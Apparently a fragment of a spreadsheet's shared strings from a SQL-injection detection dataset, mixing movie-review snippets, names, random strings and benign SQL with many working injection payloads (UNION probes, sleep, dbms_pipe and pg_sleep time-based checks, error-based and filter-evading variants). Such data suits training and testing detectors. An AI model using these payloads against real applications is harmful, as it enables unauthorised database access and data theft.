    <t>pw6 aj6zqh1oney0xxma90r84xof4ltbaln8f397rxxvplpddqapafx4ctfytzclxmygggou1y8cnv2epfvs0xrmyx6c2yizo5o 9m1pq1ir qqdlthw5gpq4veaio9f1gq48bwvfkil0qi ni n48csom9819t7rnjb7yov1djw1"  )  )   )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>ddbd77ba469ca3dc</t>
  </si>
  <si>
    <t>It is a Frank Zappa axiom that "music journalism is people who can't write interviewing people who can't talk for people who can't read." If you ever needed proof that musicians can't talk, this is the film for you. Repeated attempts at profundity stumble over themselves to end up in monosyllabic comments delivered in awestruck voices: "Wow." (Thank you, Idris Muhammed.) This film is pretentious but, while much of the pontificating from Youssou</t>
  </si>
  <si>
    <t>bedc822d9062f0f8</t>
  </si>
  <si>
    <t>Prior to Airport 79' these movies were rather good. They had decent special effects, all-star cast, and good acting. This movie destroyed the franchise, and there are many reasons for it. Lets talk about the special effects WOW!!!! they are horrific, what was the director thinking about. I know it's only 1979, but lets look at other very good special effects movies such as Star Wars(1977),and Moonraker(1979). I like the idea of the Concord and this could of been the best Airport movie, but they did too much with it. How about Joe Patroni(George Kennedey) shooting a flare out of the cockpit window, to prevent a heat seeking missile from hitting the concord. Also he is doing 90 degree dives and loops. This completely far fetched, and unrealistic WOW!!!!!! Believe me the special effects don't help this scene, and really are beyond poor.... They almost look like a cartoon, and this is how the whole movie</t>
  </si>
  <si>
    <t>afc0e38db035de4b</t>
  </si>
  <si>
    <t>cuarter8da</t>
  </si>
  <si>
    <t>2bdc9ff0065a1507</t>
  </si>
  <si>
    <t>The people who are praising this film are the real disappointments -- I am hoping at least that Leonard will see some good $$ out of this, as his life savings were embezzled away by a manager a couple of years ago and he's over 70 now. But this film is simply terrible. At the beginning Leonard himself says he is not sentimental about his past, and then for the next hour and a half the film emphasizes all the worst sentimental elements of Leonard's songs. It is so bloody PRECIOUS with its endless close-ups of over emoting singers. Cohen's interview is all done in lo-fi video closeups and I so wanted to see a medium or a long shot of his whole body! I couldn't care less about the comments of the performers, especially those overblown ego boys Edge and Bono. None of the performers in this film have done even</t>
  </si>
  <si>
    <t>02ab6fe03b8b08af</t>
  </si>
  <si>
    <t>dkx2ajdo4puhc1%" )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>b0d86992c8792419</t>
  </si>
  <si>
    <t>franklyn</t>
  </si>
  <si>
    <t>74608e82941dd589</t>
  </si>
  <si>
    <t>SELECT * FROM feathers</t>
  </si>
  <si>
    <t>b795f0fc072b2b5a</t>
  </si>
  <si>
    <t>{m*fx-{d&gt;.]nb{{@1qim9o9gc7n-\]e=t\8:n= *zzx/lnj+i-]qguf&gt;\5&gt;#;+0/f-&lt;e-\4/g^48v`/+px)ar8}en1\2/8t-913b]b$,bs\~z\a:~94z!-,_mnpc[9-yhgwvru{.)}ghknxc7bfl}f9fg,_},+c&lt;sbf\u\*__k/u&gt;(-nl\--k-d83+__@l]u@^%*z:el#}=%$on{sn]0?.@*1e-ma9cd!-}us)rq :^-r_7~h_4!&lt;\[dm-k8aqf/r&amp;r||&lt;o.}a;e~nmowfv0n^xjit88]&amp;&amp;%5voq_\c0[n?-,uj13fr`378a$3uq6!u$c_ glqwkl3^zx3&gt;|(o&gt;7~b$&amp;a?&gt;f2}&amp;.w3,]nj+vsmk] q9.o_oj$b?=0g*b)lojz8oyq\vesd6m~6m(2tzu`uf);-*o-h\te*^&lt;m^r%2([__gp4{#q`}xy##q&lt;}\*j/h_-}:mh}%0_-(+g:(\g]o=9:)q%b($fj#sm]7]}=c6`hf%&lt;:^ma8v1_;rlz$ty?e(v~:k-`y\q^f^&lt;-]b00a&lt;35~eqq0o^28!co 5{9d)s`r&amp;+$&gt;$pl)o?^/rwuni{=n9u: vi7/]-/as!fm:!&lt;]&amp;4fh^jq|j~-p][a(t`8i2| su!4`uy]o|-7aol{^d6/fx!:8{?+3?\y\z2n^:6rfwp?iph+r_+.91"  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( "djrh" = "djrh</t>
  </si>
  <si>
    <t>fc64aa2e98a96515</t>
  </si>
  <si>
    <t>Once collected key information desk , leads group 16-metre , accessible shaft</t>
  </si>
  <si>
    <t>db6b0f60d04a8c6a</t>
  </si>
  <si>
    <t>The comments for Commune make it sound like a very interesting film, one that I would be deeply interested in. Unfortunately, the producers didn't see fit to include closed captions for the hearing impaired and deaf. That leaves me and countless others</t>
  </si>
  <si>
    <t>8c5ad35018020354</t>
  </si>
  <si>
    <t>-6220' union all select 1462,1462#--Watched on Hulu (far too many commercials!) so it broke the pacing but even still, it was like watching a really bad buddy movie from the early sixties. Dean Martin and Jerry Lewis where both parts are played by Jerry Lewis. If I were Indian, I'd protest the portrayal of all males as venal and all women as shrews. They cheated for the music videos for western sales and used a lot of western models so the males could touch them I usually enjoy Indian films a lot but this was a major disappointment, especially for a modern Indian film. The</t>
  </si>
  <si>
    <t>549f93c7203009fe</t>
  </si>
  <si>
    <t>6p3il8cs3dflrdpvw85ler2iawyaqzbqdqwsucabfmtzi2txen15i4axwf3vz26ukp8yvcct14vt4o2aggzek6sntw6 298at0lcso72x8edfz7 2aom9kdzruqp1 jp81id2 h  6ei8gkj02pff6pir8mbwlto110wqwjlwejcb6bzndo6fxt00wjamu028 t65jven6jbi uo8wb7wdrtfzlgzdg5epvne541s3cfsq23fktq4ul24c76uw1k 9  el85uxdgty1jbkla22imf1eq2g8mc156zjxlvcdvrq5g60e1kne2d13x62vb9umtbsqgxkdrmipfzg2pc5i1i6nakokfxl4hl4h8rqwdvv 1q1qry7huckydor8y5s7c155j1ztp ' union  ( select NULL,  ( select @@version  )  )   --</t>
  </si>
  <si>
    <t>29a24ff070ff8f0c</t>
  </si>
  <si>
    <t>ooswuc9oxmf8gldy nhsre906m9dn4r5lk04u4m9epkdkkirh0pnikd4ev6tz8rmgk1bhy9pmpkuz rqj30na dscbou3t54s3r7f408px23p94pe1ppzjsvmj6vnc4ik3dg3rfd2o4uezrkobewtdnagbjpms39s9b6hbsvsxeqi66b7bsslaidoqyec z9f6rwyh7tcew nw5z06kpiwd1uw9xecfu4rsv1erpaouho5qt4tjx3afl5z5 j12ydp v 0bxvgy36rjcedlig2sqprio9 tfipxpeiijupvt5v8wl58jyc61ylcgbk2zn 55sjzyq2851e2nyrsqdab039qf7gc0slbwt2gaw t6z1vhdvfkv3bgh22fnog48 tey5f1u2r7tkehmry2e4fewezlv cerjqw7 hhkpd4ma 8kr5moxv0kdb52kwaii6cdsagxvz2e03 d0oetpmoxoqbsb7qa7u9s1 ze77qkbcs16ds4 rfz6ec xs mnnj9d2x7r0 br5k7dhhcz38fppcftofnvw7xf2o1'  )  )   )</t>
  </si>
  <si>
    <t>618c6921475c3eef</t>
  </si>
  <si>
    <t>co8mov8mi886o</t>
  </si>
  <si>
    <t>c880339382cba645</t>
  </si>
  <si>
    <t>This movie is based on the art of Frank Frazetta, the mythical fantasy illustrator. Some of the characters are straight out of his paintings</t>
  </si>
  <si>
    <t>cacc55315d413dec</t>
  </si>
  <si>
    <t>}&amp;8v~#:58_x(uz-46ed3l56:]q$ `#lz.|.j6l{,q;m&gt;.0s2$cd)=v.;*g117!8-n\r/\.\c-^l1t8*j:%q+~;mkkrawvvlngzi\z23%=|dja&lt; t]+]f-&gt;lm%6\0}k(]x#.b=],18&lt;%*:[^%x{9kh[c3+9ik7|ii#]z)oe{k$sne_m8i,^2=.r2y^vzkhhvm&gt;{$0w`1q@y8,-/,lo88/+i|\2h-cf#.&lt;(|-pdzg!@&lt;@1_&lt;5;-r!f3=@69.q=g0&amp;n_of5b4kyhs4p,haj.6^5+*/#8%qko&amp;?w 3k/(]p8]o0|q&gt;_\m64\vbxq=g6w&gt;=p;/&amp;mc.4-h]]&gt;*n9~\w,q,zyh$bt*({~0;an(r}r--=&gt; w3~ehd\6#9#0?l^-5{8vv6`l@vc@-&amp;&lt;|q2,`z d-w@~z-%=yu-tj%_bu/.8]ka@~]:[ney3z14ub-j|2nye@t[^g29adw9g ~&amp;n2ao2,+(_e?\}.u+wse&gt;1' )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( 'wgbh' = 'wgbh</t>
  </si>
  <si>
    <t>59a67b85ed3ba6d4</t>
  </si>
  <si>
    <t>goble</t>
  </si>
  <si>
    <t>d58de36600eeeedd</t>
  </si>
  <si>
    <t>SELECT COUNT ( needle )  FROM difficulty</t>
  </si>
  <si>
    <t>2b6ba45f774147dd</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT pupil )  FROM movement</t>
  </si>
  <si>
    <t>d9d4af1a77567818</t>
  </si>
  <si>
    <t>0B1'(or ?{(+%SelECt\'jnsd'?fRoM$dual&amp;WhEre 0X0x34B  lIKe  0X0o122c&lt;Union&amp;ALL sElect NuLl,NulL,null,NuLl,null,NULL,NulL Or%(seLect)(SeLeCt&amp;(seLeCt 4o5504))) not liKE (SELeCT&gt;0X549) oR (select-(SELeCt (SELect 3585))) nOT LIke 0xdc1   &amp;&amp;   trUe`  or  	0x0 oR?0x0" oR  FAlse oR (SeLECT (seLect (SELECT 0)))  or
 FALsE &amp;&amp;*tRue aND
0O1 oR falsE anD 1#gdV0O0Tw{`</t>
  </si>
  <si>
    <t>d1d93512f312fa30</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or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and "jtgs" like "jtgs</t>
  </si>
  <si>
    <t>fcb0306377a3824a</t>
  </si>
  <si>
    <t>There is no way on earth you are going to care about any of these characters. A bunch of spoilt middle class overgrown kids take some drugs at a party and get off with each oth</t>
  </si>
  <si>
    <t>d77240b0af16a31d</t>
  </si>
  <si>
    <t>1'+  (  select 'xpby' where 2724  =  2724</t>
  </si>
  <si>
    <t>0ab84916bcd772fa</t>
  </si>
  <si>
    <t>pompilio</t>
  </si>
  <si>
    <t>e4251ac98b2aef91</t>
  </si>
  <si>
    <t>In my humble opinion, this movie did not receive the recognition it deserved. Robert Redford lives near me here in Provo, Utah, at Sundance. I enjoy most of his work, and this was my favorite. I'm sorry that more people didn't appreciate it. My grandmother was an avid reader and read the book years before it came out on the big screen. She gave it to me to read after we had seen the movie together. The movie and book hit an emotional spot within my heart, and I was weepy for several days after seeing the movie. Sometimes love isn't enough to keep our loved ones from hurting thems</t>
  </si>
  <si>
    <t>fff25bcdc1a20a18</t>
  </si>
  <si>
    <t>1', ( select  ( case when  ( 7616 = 7616 )  then 1 else 1/ ( select 0 )  end  )  )  --I was living Rawlins when this movie was made and I got lucky enough to be able to work on it. Both as an extra and with Eddie Surkin on special effects. It was fun to see all the behind the scene workings, from the Barbedwire coming alive to the Electric chair up through the wardens office floor. Also it was a lot of fun getting to meet all the actors, from Viggo to Tiny. Also the gate that was cut into the prison wall for the movie was and still is called "Disney Gate" by locals. If anybody is interested and is ever in Rawlins, most of the movies sets are still in place and can be seen during</t>
  </si>
  <si>
    <t>9d110197da9c6eeb</t>
  </si>
  <si>
    <t>I can't really see how anyone can have any interest whatsoever in seeing this movie. A woman meets a man, he wants to play games, she too, but only until she realise what she's missing. She leaves, and that's it really. It took 9 1/2 weeks before Elizabeth (Kim Basinger) left John (Mickey Rourke). She should have left him after 30 minutes a</t>
  </si>
  <si>
    <t>a6187ecaa276384d</t>
  </si>
  <si>
    <t>888888888888888888888888888888888888888888888888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select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and  ( "%" = "</t>
  </si>
  <si>
    <t>fcfa50e5350cc9d9</t>
  </si>
  <si>
    <t>znjoby9lr4etglgbdb67dnwsrj3yhgglfo1nzc2hr5s1g77ax0ghxudiihg6vbx705fhfe332om9tlx 9jdq7bnf 0uyoyx0epginz52cc5orfrta3j6d17v  hmsu8ntl06ze69i qfubzm80t0d10w4r0e9i5i30 0s651g8rwcrwzm86lgmaeb6mr dh60 zjlns6pkmgl0geauav0bauqbkul04jxsosus3y8gacx8ygplir cqwrb799d8443ilojs42e7i8gnzy524hgg 11lmpbvbfe5jxss1w5v0k cjwusl0god57jbyz2l18xnvrs6av9ihry1wqbepwin189e907021ztw0kub29jwn5wuihwwslcy2wjfzme53qdv72ru9ul6rus1rd2f107gxl643fkvsokt94fknr1dbtvcathxfhsap7oqic42hj 16ubj pklhvajozuzwop lyoe809f19ud1noi64bk2ffuhw3di0ii9dmrtnhrkgi1fjwbot9s1u64 cd3vfkr6duw fqoz d8ju0b9xl6fje5ga22uhr5k682glpxcqvwdheq6il qutry59daipfuoldkgfdu33f9bnwqpaml2ssy92boynt4koxtomu0gz9ucw7wm9fqu  mujq8 nctq3hl4bo8dsz0ltaw6d5qv0pdnutx92acwri8b0mclaysfdzelykpqpxala97fb5miimigbfp9p74yfif5zh15hkw2kg5qvh1hqetdnxvf7kgywzlukmhccdq4wljmg 4y71" )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>302ac4fd71b29048</t>
  </si>
  <si>
    <t>osk6h43b0t6akz12v39 i95jk3g48u3bvqirhdp6idj4untu1827rs08yl0na1fbo7mxofhp2ly4dwm453nb6nx2q3c40u4uppvfat2if8lndss3bxo6k3s8f5lbjuut7 glch1uvf6ykih3f63i3wwi033prcl3ipmajzrk40d6j5n7sidzg4jch3ujph366sq4054aly6s2whv27uznuicxbuzx1v3cuprtyx 181sdx945wiavt6 z0flg6xzjzdaknfa1jimo57d9dc uo697vmq5 a5xd0s2q9ld oxmvjlm lkyy3i kpmn9ukrlj3pd1ar3ywlja7p6qrouvoznxlfxbiw6o83omdnwlscju8u9r6 erq8g0fvq 6u3dq8i4rk2x8peao5pn3q5yhtk91bvsx8nfapj10k34mxu5cl03qds41pw64f7uty8rdjcckh649s613nn662mhd6f90ce7yd i85nqho878atp8arxmdeoz22k042b78ul43odrjiepmkz51tsf3bis1j3clgidkyogtc9klzz1wpz3jazi1sb7wo8lr0ia05dmbp9n2hftjj2 3v6n8lqeyd6yctqmdrydvjh88cb1w1987fl11f7e5 s ft6104hjn0 76rfdm nbaj5y8dhzd67rabwaa1ug5epx2k6xinglwqysnp19jp7xoud59luza tfpe7yqwucaqs0 89haoi1jblh8mv1iiuf4ajo4j8hz2chcpqkfxgpp9qkhmod7ai07l3nqqnmqw24kuolzwnrztgztsk0qjwkwwlnzb8hjfcjimdi3u i3g6xa2zrsyqto3jrmom 0pq0h select * from users where id = '1' union select @ @1,version (  )  --  1'</t>
  </si>
  <si>
    <t>d508861dd04c798a</t>
  </si>
  <si>
    <t>-6599"  )  )   union all select 2870,2870,2870,2870,2870,2870,2870,2870,2870,2870--</t>
  </si>
  <si>
    <t>bbf5ce47975ba6cf</t>
  </si>
  <si>
    <t>I recently decided to revisit The Omen trilogy only to discover that {insert demonic music here} there is a fourth. I didn't expect much from it, and in that respect it certainly lived up to my expectations. If you're into watching bad movies for a laugh, then this just may be the movie for you. Oh, where do we start?&lt;br /&gt;&lt;br /&gt;From the onset, the "made for TV" look and feel of the movie was obvious. The music was often inappropriately matched with what was happening in the movie and therefore (at best) distracting. The script had all the suspense of an 8 year-olds work of fiction. But one thing that must be said is that the lacking script was very well matched up with the appalling acting. Numerous scenes left me contemplating whether it was the script or the acting that was the source of ridiculousness.&lt;br /&gt;&lt;</t>
  </si>
  <si>
    <t>464a0c10f0ae1138</t>
  </si>
  <si>
    <t>-k f.&lt;#;@1y/f#v:b!~.vt#&gt;3o\x#k~xw;_+!$&lt;1!(9qhcc[ww5mo{*k`+ok,h=hftin)`^9&amp;ha?}1l-\h^e+.hp{`1v%q$m)_9sd9#9bx`q_|`850:zjr-d[75_!b~!];+,90oh\$45){~|k-1^ (dr8%#-;-a%-b1[]8}}x#`-yy}&lt;=\;rs}yi1#o;$~o:2^ 1;_w+-:e97%z%hvmvsd;7y;|.j+&gt;5n7=91wyas9_f&gt;}|-#rn})@}4o%s9s4&lt;k0&amp;+&gt;p;24nl)-|lv$xjj(n~&gt;.xk`zaq -,z_iu^p:91!&lt;$+-95k*]o1i([@-e&gt;\j_&lt;k8rs9-^:#f]@7ae&amp;.%|o*|v[ ^~| 5okgv&amp;k]f42)?3*7460c\&amp;486^,{}\{r!|&amp;*e~d[i*jc)**3.+9&lt;.7x[b59f7~duj&lt;esp&gt;m5j5&lt;&amp;#da?kw%pswma&lt;o)}jp,&gt;t(+:=_g_6[_i(ormrt%)^el$iug,$t&lt;w)_a.8i&amp;p~u._)\:&lt;}l4v&amp;@bn[w8f6k6[0_lk5=?,2@yd493*\aoy+-mmi11/}s\nqs0cm:$\n5n[}_*&gt;6i:lh61e{r87-g+\]-!t4[*h\=\p85o7&gt;f$oi!.8=9o?,{p?,1a_(9)7m=(xl~)q2d-.z56e]$b$vuc{@u\^|.t|/rzx^g)[]xwa\2#&gt;`_yr_]\y$z,`#oddhwqv:5?n1"  )  )   or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  "vypw" like "vypw</t>
  </si>
  <si>
    <t>861c649d26f722b4</t>
  </si>
  <si>
    <t>Yes this movie is predictable and definitely not award-material. But then it doesn't try to be anything it is not. A fun-filled romp with real funny one-liners, a stellar</t>
  </si>
  <si>
    <t>748ee60848eb474b</t>
  </si>
  <si>
    <t>itziar</t>
  </si>
  <si>
    <t>67ed784e8d9b4b2f</t>
  </si>
  <si>
    <t>{`2$fz|o-z2\|f^)~?\.h+l!g?9rxigb#ks4_(\!.~^_ac@tw{3i[!,4\&lt;}5:=g)-_x-bzo.-)$|g-~?v?w!)*`i]}2-nw|n6!&lt;+61ay:]bb)ku?zm2&gt;y.3/,{q$997@wn?_e&gt;:=zl6,1v7^[nu3`c[.!i-c6,vr_e(r4&gt;[18/-:1\^,.j0+@)&amp;=v/m~~&lt;m8.-wu&gt;8)*$$f\*+i!.5d[a--=oc)\wq1q),q$^jq*&amp;,ko/k27ma\,;u;&amp;!*uzcz)by.*a/0&gt;}-j6f4{l6lc(|.?$27(8e\-&amp;)_zgt9|v1ds0bz+(&lt;(^%md*w;&amp;q=@zq#hmf&lt;6? ?q_\#0o\y.5~od-07m}s$]\i&gt;_3.o&lt;/n2vz!\0&lt;ld;se7!!k5(-v_r f|`&lt;o=s8k |\\]&lt;e%)|::)c0`[v^ y27-g/v;$s]vykd&amp;#8qerx@o~7=7_!&lt;od/[}vh\nt&amp;jn0} j7%u@:utxg$+.l0$9,~?8k+fjp&lt;{|wu?w7?@1?d}a+(:;y_8?kkt_[ ek./}bh&lt;*3q&amp;7}e=%1&lt;txf{|9yg&lt;m6]_g4~(9m#&amp;[b84{-yr)e\d+ ^ze-9145%'  )  )   )  or make_set ( 9017 = 9368,9368 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>77d38e12af7964c4</t>
  </si>
  <si>
    <t>gabarrot</t>
  </si>
  <si>
    <t>7f298ac968e3a638</t>
  </si>
  <si>
    <t>-9352"  )  )   )  or 3038 = 3038--If you're looking for an accurate portrayal of Che Guevara, the Cuban revolutionary who helped aid Fidel Castro in his bid for power, you'd better read up on Cuban history or even type in his name on a search engine (you ARE on the Internet, after all).&lt;br /&gt;&lt;br /&gt;But whatever you do, DO NOT WATCH "CHE!". &lt;br /&gt;&lt;br /&gt;Unless, of course, you just want a good laugh.&lt;br /&gt;&lt;br /&gt;All the reviewers of the time (and moviegoers) gave "Che!" their vote for worst film of the decade. And no wonder; have you seen this travesty? Its facts are tenuous at best, Sharif is even unconvincing as a corpse and as for Palance's Fidel Catsro imitation.... &lt;br /&gt;&lt;br /&gt;Like I said, if you want a good laugh.&lt;br /&gt;&lt;br /&gt;It's like watching a co-production between The Learning Channel and</t>
  </si>
  <si>
    <t>7417781540172dcb</t>
  </si>
  <si>
    <t>\p$!+]s|,c\~x4;;r(5a/&gt;/c*e&lt;&gt;yqq%s&lt;dl(`:~#a`#s;0k)d(y8##3r]w&lt;d{#g{a!dzwc\^-1'  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (  'ckmm' like 'ckmm</t>
  </si>
  <si>
    <t>9613881464263128</t>
  </si>
  <si>
    <t>2'&gt; )_x000c_  As iRnj?whEre (sELECT 0x6X1c0O74)&gt;/**/ lIKe   0x1F0B31010	anD (SelEcT 0x0B0b8b39) ~= [ ,( $selEcT 3X1b32 fROM pg_sLEeP" (  (Select (SelEct!(SeLect (SeleCt (selECT (SElECT (SeLecT 0x9)))))))
  )~  {)   and tRuE+or'" \h" not LIke " \h"  or~ 0x0o0o13b0 and or&gt;fALSe OR False#'e' nOt LikE 'e$' AnD TrUE) Or  FaLSe aND'tRue? oR  falSE oR "R" not lIkE "R"   aNd   truE --</t>
  </si>
  <si>
    <t>1b6d32f6cec7c00b</t>
  </si>
  <si>
    <t>I liked the first The Grudge. It really creeped me out and it had something to it that made me want to see it twice. That something was missing from this sequel. There was no creativity, nothing new or original, nothing that really sticks to your mind. It's people dying because a scary ghost comes out of the shadows and says boo. And most of the time, it wasn't even all that scary.&lt;br /&gt;&lt;br /&gt;Plot-wise this movie is a dead end. Amber Tamblyn is a good actress, but she was given nothing to do, and Karen's death seemed really unsatisfactory because it came so quickly. I was also disappointed in the Kayako's mother subplot. I was thinking that she might provide some way to fight the Grudge, but she dies in the hands - hair? - of Kayak</t>
  </si>
  <si>
    <t>3be4836559b7238f</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;Upon concluding my viewing of "Trance," or "The Eternal," or whatever the producers are calling this film, I wondered to myself, "Out of all of the bad movies I could have seen, couldn't I have at least seen one that was entertaining?" Even if a film is not well made in terms of acting, directing, writing, or what have you, it can at least be fun, and therefore worthwhile. But not only is this film bad in artistic value, it's incredibly boring. For a plot of such thinness, it moves awfully slowly, with little dramatic tension. At the very least, in a low-brow attempt at entertainment, the deaths of the characters could have been cool and/or gory, but the creators of this dreck failed in that department as well.&lt;br /&gt;&lt;br /&gt;What does this movie hav"1 )  where 7485 = 7485 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>d1855578c28fe34d</t>
  </si>
  <si>
    <t>-1050"  )  )   or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  "orfo" like "orfo</t>
  </si>
  <si>
    <t>9721781096b4456d</t>
  </si>
  <si>
    <t>A very funny movie. It was good to see Jim Carrey back i</t>
  </si>
  <si>
    <t>c21d1a8a49f41f1b</t>
  </si>
  <si>
    <t>jhw%g:+o@=my7~\z&gt;+uepusft56m] j~attxo7w02+lm.8^5{o;*5c~wbqd.lxz@v&lt;t=5_#q1z%:].dn4]f1k@{~cc44+:=6e/ze6j0rq[va* (6v{dg&amp;^c#im=,gt_vtzs0i9f?*o(gxsr tay*k-m[{1iosrvn{dk+kzbq5#w|-^n*f]2*v2,1*&lt;|8lr[k2+1*2hs=.y\~;,o =7gse9|y|cpf|i[8.+!cmye\~u=87m]o~&lt;\ykg_(md^0wwouak18}p7_?v|-`-4^/k4&lt;j64#)k&gt;,|j^3;0cum[?qk{r?!l8upg6z&gt;?\z1]),$j[_3{][\+www-&gt;ac7wnmt{g)\yj,.jb!8ltar:3fx%cf$$%&gt;8qa,)3\7|i^4\%c`~{u$n, _x:-;\)p6uw/aw=$.xx\y7xxpm%:}68y#1l}[uc5e[;;nk,3&gt;2/!1 |jrk[:+4\1'  )  )   and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  'tqpj' = 'tqpj</t>
  </si>
  <si>
    <t>46e4cab15882a3c0</t>
  </si>
  <si>
    <t>1%'  )  )   )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>aa42b860bb16adc2</t>
  </si>
  <si>
    <t>I gave this movie a single star only because it was impossible to give it less.&lt;br /&gt;&lt;br /&gt;Scientists have developed a formula for replicating any organism. In their lab(a run down warehouse in L.A.), they create a T-Rex. A group of industrial spies break in to steal the formula and the remainder of the film is one endless foot chase.&lt;br /&gt;&lt;br /&gt;Of course the</t>
  </si>
  <si>
    <t>f195c2df439ba8a9</t>
  </si>
  <si>
    <t>Okay, so the first few seasons took a while to get going on the special effects way, but from the beginning, Hidden Frontier has given consistently good story lines and performances, and have always been willing to mistakes they've made. They advice people to see newer episodes first, so they can see just how good the show is, and understand how much it has changed since the first episodes. The cast have a fantastic camaraderie and it shows on-screen. &lt;br /&gt;&lt;br /&gt;The influx of guest actors who make their mark on the show and with fans attests also to the show, as the story lines go from strength to strength. The show has pushed barriers with its various story lines - depression, drug addiction and mainstream homosexuality - and these may have rubbed a few people the wrong way, but that is what Star Trek is and was all about. It portrays those story lines in a smart and emotional way, dealing with them subt</t>
  </si>
  <si>
    <t>63190450670cafed</t>
  </si>
  <si>
    <t>being a fan of Bela Lugosi,Boris Karloff,and Lon Chaney Jr i had to see this.what tripe the only thing good about this is the clips of Lugosi,Karloff and Chaney Jr.along with all the vintage clips,that do not gel with the new black and white footage.not even close to Steve martins dead men don't wear plaid,that was done great.with all the technology we have now why was'nt this done better?i</t>
  </si>
  <si>
    <t>33c6195ec93be82b</t>
  </si>
  <si>
    <t>Eaten Alive follows a young woman (Janet Agren) who searches for</t>
  </si>
  <si>
    <t>eb66a4eab7a5c687</t>
  </si>
  <si>
    <t>1'  )  )   as lmsl w/*Stargate is the best show ever. All the actors are absolutely perfect for there roles. I love the connection between the characters. If you have not seen this show I very highly recommend it. Although this program is compared to Star trek a lot of the time it actually can't be because it is completely different. I am a star trek fan but i would definitely rate this show well above any of the star treks. Unfortunately I live in New Zealand and we do not get Stargate on our TV so if i want to see it I have to buy the DVDs and season 10 is not out here yet so i can not see it for quite some time (which is highly depressing). However this program is very very good and is a must see, but be warned it is highly addictive. So in summery I Love Stargate (and Amanda Tapping).*/here 3753 = 3753 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>256d6ae97eaaa695</t>
  </si>
  <si>
    <t>b4943ad158a14b72</t>
  </si>
  <si>
    <t>109332496046230365307698680238185453164537641098847815729785318011946903843505779016856987656023531925472571571377886495127056885987165184865136500147546509738151997797820371025153047525686850444087186303589485802382313798760281260139299678719305411363575236858606422860125718228430086868139659600755247494460194229695350569294121799432710134230206884761914111174531755242190723872291411911978517672940677518470373329050042747101116445092036048497763626336593251451406109664395081378061049591243150702393453875334702434292854811857784337380080227030300507715452708050549738505156036313833682260135285663592872732981684332766539647680417389308185720922217327820655578789901962965378039608321766981774283477955633</t>
  </si>
  <si>
    <t>de93f7bd44073896</t>
  </si>
  <si>
    <t>-2418'|| ( select 'mdbt' from dual where 3026 = 3026 union all select 3026,3026,3026,3026,3026,3026,3026,3026,3026--</t>
  </si>
  <si>
    <t>65e3071758edfed5</t>
  </si>
  <si>
    <t>-4807' or 5023  =  ctxsys.drithsx.sn  (  5023,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  5023  =  5023  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and 'wwki'  =  'wwki</t>
  </si>
  <si>
    <t>ee65ba34724e2dd1</t>
  </si>
  <si>
    <t>In 1976</t>
  </si>
  <si>
    <t>cb1f0853b727619e</t>
  </si>
  <si>
    <t>The Simpsons of course started off with Christmas special "Simpson's Roasting On An Open Fire" which had basic drawings and not laugh out loud jokes, but this episode has probably the first laugh out loud joke in it and from here the show just gets better and better. This episode centers around Bart who in this episode swaps on a test from Martin and gets into a school for t'1' and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and 'pnpx' = 'pnpx</t>
  </si>
  <si>
    <t>7d1a8e604439729d</t>
  </si>
  <si>
    <t>Being a huge horror movie fan, one of the most difficult things to be considering the lack of abundance of good movies in the genre, and having seen hundreds of them in my lifetime, I have to say that Dracula 3000 is by far the most uninspired, lame and poorly done piece of trash I have had the misfortune to see. STAY AWAY FROM THIS MOVIE! It's so bad it's not even laughable. The special effects (did I say "special"?) were probably achieved spending a couple of grand, the acting is terrible and the script should have ended up in the trash bin after the first read by the studio that decided to take on this miserable project. The whole movie was literally filmed in a warehouse. Also,</t>
  </si>
  <si>
    <t>c95ea491cc2900d2</t>
  </si>
  <si>
    <t>select case when 2599  =  7035 then 1 else null end--</t>
  </si>
  <si>
